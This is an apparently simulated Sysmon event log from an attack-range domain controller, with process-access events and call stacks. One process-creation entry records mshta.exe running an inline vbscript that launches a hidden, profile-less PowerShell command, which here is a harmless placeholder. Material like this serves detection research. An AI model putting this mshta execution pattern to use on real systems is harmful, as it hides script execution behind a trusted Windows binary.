15:59:43.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000027526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.680{7901BC46-536F-6008-7706-00000000A301}5156C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "vbscript:Close(Execute("CreateObject(""Wscript.Shell"").Run%%20""powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit"",0,true"))'"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000027525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.662{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.647{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 